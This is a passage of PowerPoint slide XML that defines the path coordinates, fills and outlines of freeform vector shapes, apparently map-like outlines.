                  <a:gd name="T28" fmla="*/ 47 w 105"/>
                  <a:gd name="T29" fmla="*/ 0 h 62"/>
                  <a:gd name="T30" fmla="*/ 52 w 105"/>
                  <a:gd name="T31" fmla="*/ 6 h 62"/>
                  <a:gd name="T32" fmla="*/ 58 w 105"/>
                  <a:gd name="T33" fmla="*/ 9 h 62"/>
                  <a:gd name="T34" fmla="*/ 63 w 105"/>
                  <a:gd name="T35" fmla="*/ 9 h 62"/>
                  <a:gd name="T36" fmla="*/ 67 w 105"/>
                  <a:gd name="T37" fmla="*/ 11 h 62"/>
                  <a:gd name="T38" fmla="*/ 63 w 105"/>
                  <a:gd name="T39" fmla="*/ 15 h 62"/>
                  <a:gd name="T40" fmla="*/ 71 w 105"/>
                  <a:gd name="T41" fmla="*/ 23 h 62"/>
                  <a:gd name="T42" fmla="*/ 74 w 105"/>
                  <a:gd name="T43" fmla="*/ 16 h 62"/>
                  <a:gd name="T44" fmla="*/ 80 w 105"/>
                  <a:gd name="T45" fmla="*/ 17 h 62"/>
                  <a:gd name="T46" fmla="*/ 85 w 105"/>
                  <a:gd name="T47" fmla="*/ 21 h 62"/>
                  <a:gd name="T48" fmla="*/ 88 w 105"/>
                  <a:gd name="T49" fmla="*/ 26 h 62"/>
                  <a:gd name="T50" fmla="*/ 95 w 105"/>
                  <a:gd name="T51" fmla="*/ 26 h 62"/>
                  <a:gd name="T52" fmla="*/ 101 w 105"/>
                  <a:gd name="T53" fmla="*/ 32 h 62"/>
                  <a:gd name="T54" fmla="*/ 104 w 105"/>
                  <a:gd name="T55" fmla="*/ 37 h 62"/>
                  <a:gd name="T56" fmla="*/ 103 w 105"/>
                  <a:gd name="T57" fmla="*/ 38 h 62"/>
                  <a:gd name="T58" fmla="*/ 100 w 105"/>
                  <a:gd name="T59" fmla="*/ 38 h 62"/>
                  <a:gd name="T60" fmla="*/ 98 w 105"/>
                  <a:gd name="T61" fmla="*/ 41 h 62"/>
                  <a:gd name="T62" fmla="*/ 96 w 105"/>
                  <a:gd name="T63" fmla="*/ 42 h 62"/>
                  <a:gd name="T64" fmla="*/ 94 w 105"/>
                  <a:gd name="T65" fmla="*/ 45 h 62"/>
                  <a:gd name="T66" fmla="*/ 93 w 105"/>
                  <a:gd name="T67" fmla="*/ 48 h 62"/>
                  <a:gd name="T68" fmla="*/ 91 w 105"/>
                  <a:gd name="T69" fmla="*/ 49 h 62"/>
                  <a:gd name="T70" fmla="*/ 90 w 105"/>
                  <a:gd name="T71" fmla="*/ 52 h 62"/>
                  <a:gd name="T72" fmla="*/ 88 w 105"/>
                  <a:gd name="T73" fmla="*/ 52 h 62"/>
                  <a:gd name="T74" fmla="*/ 86 w 105"/>
                  <a:gd name="T75" fmla="*/ 53 h 62"/>
                  <a:gd name="T76" fmla="*/ 84 w 105"/>
                  <a:gd name="T77" fmla="*/ 54 h 62"/>
                  <a:gd name="T78" fmla="*/ 82 w 105"/>
                  <a:gd name="T79" fmla="*/ 54 h 62"/>
                  <a:gd name="T80" fmla="*/ 79 w 105"/>
                  <a:gd name="T81" fmla="*/ 53 h 62"/>
                  <a:gd name="T82" fmla="*/ 77 w 105"/>
                  <a:gd name="T83" fmla="*/ 54 h 62"/>
                  <a:gd name="T84" fmla="*/ 76 w 105"/>
                  <a:gd name="T85" fmla="*/ 57 h 62"/>
                  <a:gd name="T86" fmla="*/ 74 w 105"/>
                  <a:gd name="T87" fmla="*/ 58 h 62"/>
                  <a:gd name="T88" fmla="*/ 54 w 105"/>
                  <a:gd name="T89" fmla="*/ 55 h 62"/>
                  <a:gd name="T90" fmla="*/ 34 w 105"/>
                  <a:gd name="T91" fmla="*/ 62 h 62"/>
                  <a:gd name="T92" fmla="*/ 27 w 105"/>
                  <a:gd name="T93" fmla="*/ 59 h 62"/>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105"/>
                  <a:gd name="T142" fmla="*/ 0 h 62"/>
                  <a:gd name="T143" fmla="*/ 105 w 105"/>
                  <a:gd name="T144" fmla="*/ 62 h 62"/>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105" h="62">
                    <a:moveTo>
                      <a:pt x="27" y="59"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="24" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="59"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35888" name="Freeform 422"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3007" y="2036"/>
                <a:ext cx="90" cy="42"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 90"/>
                  <a:gd name="T1" fmla="*/ 22 h 42"/>
                  <a:gd name="T2" fmla="*/ 2 w 90"/>
                  <a:gd name="T3" fmla="*/ 20 h 42"/>
                  <a:gd name="T4" fmla="*/ 3 w 90"/>
                  <a:gd name="T5" fmla="*/ 18 h 42"/>
                  <a:gd name="T6" fmla="*/ 5 w 90"/>
                  <a:gd name="T7" fmla="*/ 17 h 42"/>
                  <a:gd name="T8" fmla="*/ 6 w 90"/>
                  <a:gd name="T9" fmla="*/ 17 h 42"/>
                  <a:gd name="T10" fmla="*/ 8 w 90"/>
                  <a:gd name="T11" fmla="*/ 18 h 42"/>
                  <a:gd name="T12" fmla="*/ 9 w 90"/>
                  <a:gd name="T13" fmla="*/ 18 h 42"/>
                  <a:gd name="T14" fmla="*/ 10 w 90"/>
                  <a:gd name="T15" fmla="*/ 18 h 42"/>
                  <a:gd name="T16" fmla="*/ 12 w 90"/>
                  <a:gd name="T17" fmla="*/ 17 h 42"/>
                  <a:gd name="T18" fmla="*/ 14 w 90"/>
                  <a:gd name="T19" fmla="*/ 17 h 42"/>
                  <a:gd name="T20" fmla="*/ 15 w 90"/>
                  <a:gd name="T21" fmla="*/ 16 h 42"/>
                  <a:gd name="T22" fmla="*/ 16 w 90"/>
                  <a:gd name="T23" fmla="*/ 16 h 42"/>
                  <a:gd name="T24" fmla="*/ 16 w 90"/>
                  <a:gd name="T25" fmla="*/ 14 h 42"/>
                  <a:gd name="T26" fmla="*/ 18 w 90"/>
                  <a:gd name="T27" fmla="*/ 13 h 42"/>
                  <a:gd name="T28" fmla="*/ 19 w 90"/>
                  <a:gd name="T29" fmla="*/ 12 h 42"/>
                  <a:gd name="T30" fmla="*/ 20 w 90"/>
                  <a:gd name="T31" fmla="*/ 10 h 42"/>
                  <a:gd name="T32" fmla="*/ 21 w 90"/>
                  <a:gd name="T33" fmla="*/ 8 h 42"/>
                  <a:gd name="T34" fmla="*/ 22 w 90"/>
                  <a:gd name="T35" fmla="*/ 6 h 42"/>
                  <a:gd name="T36" fmla="*/ 23 w 90"/>
                  <a:gd name="T37" fmla="*/ 5 h 42"/>
                  <a:gd name="T38" fmla="*/ 25 w 90"/>
                  <a:gd name="T39" fmla="*/ 4 h 42"/>
                  <a:gd name="T40" fmla="*/ 26 w 90"/>
                  <a:gd name="T41" fmla="*/ 2 h 42"/>
                  <a:gd name="T42" fmla="*/ 28 w 90"/>
                  <a:gd name="T43" fmla="*/ 2 h 42"/>
                  <a:gd name="T44" fmla="*/ 30 w 90"/>
                  <a:gd name="T45" fmla="*/ 2 h 42"/>
                  <a:gd name="T46" fmla="*/ 30 w 90"/>
                  <a:gd name="T47" fmla="*/ 1 h 42"/>
                  <a:gd name="T48" fmla="*/ 33 w 90"/>
                  <a:gd name="T49" fmla="*/ 2 h 42"/>
                  <a:gd name="T50" fmla="*/ 36 w 90"/>
                  <a:gd name="T51" fmla="*/ 4 h 42"/>
                  <a:gd name="T52" fmla="*/ 39 w 90"/>
                  <a:gd name="T53" fmla="*/ 1 h 42"/>
                  <a:gd name="T54" fmla="*/ 41 w 90"/>
                  <a:gd name="T55" fmla="*/ 0 h 42"/>
                  <a:gd name="T56" fmla="*/ 43 w 90"/>
                  <a:gd name="T57" fmla="*/ 4 h 42"/>
                  <a:gd name="T58" fmla="*/ 46 w 90"/>
                  <a:gd name="T59" fmla="*/ 6 h 42"/>
                  <a:gd name="T60" fmla="*/ 46 w 90"/>
                  <a:gd name="T61" fmla="*/ 9 h 42"/>
                  <a:gd name="T62" fmla="*/ 50 w 90"/>
                  <a:gd name="T63" fmla="*/ 9 h 42"/>
                  <a:gd name="T64" fmla="*/ 52 w 90"/>
                  <a:gd name="T65" fmla="*/ 6 h 42"/>
                  <a:gd name="T66" fmla="*/ 57 w 90"/>
                  <a:gd name="T67" fmla="*/ 4 h 42"/>
                  <a:gd name="T68" fmla="*/ 64 w 90"/>
                  <a:gd name="T69" fmla="*/ 7 h 42"/>
                  <a:gd name="T70" fmla="*/ 67 w 90"/>
                  <a:gd name="T71" fmla="*/ 3 h 42"/>
                  <a:gd name="T72" fmla="*/ 75 w 90"/>
                  <a:gd name="T73" fmla="*/ 3 h 42"/>
                  <a:gd name="T74" fmla="*/ 81 w 90"/>
                  <a:gd name="T75" fmla="*/ 6 h 42"/>
                  <a:gd name="T76" fmla="*/ 84 w 90"/>
                  <a:gd name="T77" fmla="*/ 10 h 42"/>
                  <a:gd name="T78" fmla="*/ 83 w 90"/>
                  <a:gd name="T79" fmla="*/ 29 h 42"/>
                  <a:gd name="T80" fmla="*/ 75 w 90"/>
                  <a:gd name="T81" fmla="*/ 28 h 42"/>
                  <a:gd name="T82" fmla="*/ 64 w 90"/>
                  <a:gd name="T83" fmla="*/ 25 h 42"/>
                  <a:gd name="T84" fmla="*/ 51 w 90"/>
                  <a:gd name="T85" fmla="*/ 34 h 42"/>
                  <a:gd name="T86" fmla="*/ 44 w 90"/>
                  <a:gd name="T87" fmla="*/ 33 h 42"/>
                  <a:gd name="T88" fmla="*/ 35 w 90"/>
                  <a:gd name="T89" fmla="*/ 36 h 42"/>
                  <a:gd name="T90" fmla="*/ 31 w 90"/>
                  <a:gd name="T91" fmla="*/ 42 h 42"/>
                  <a:gd name="T92" fmla="*/ 16 w 90"/>
                  <a:gd name="T93" fmla="*/ 41 h 42"/>
                  <a:gd name="T94" fmla="*/ 9 w 90"/>
                  <a:gd name="T95" fmla="*/ 37 h 42"/>
                  <a:gd name="T96" fmla="*/ 2 w 90"/>
                  <a:gd name="T97" fmla="*/ 33 h 42"/>
                  <a:gd name="T98" fmla="*/ 1 w 90"/>
                  <a:gd name="T99" fmla="*/ 24 h 42"/>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90"/>
                  <a:gd name="T151" fmla="*/ 0 h 42"/>
                  <a:gd name="T152" fmla="*/ 90 w 90"/>
                  <a:gd name="T153" fmla="*/ 42 h 42"/>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90" h="42">
                    <a:moveTo>
                      <a:pt x="1" y="23"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="23"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35889" name="Freeform 423"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3007" y="2036"/>
                <a:ext cx="90" cy="42"/>
              </a:xfrm>
              <a:custGeom>
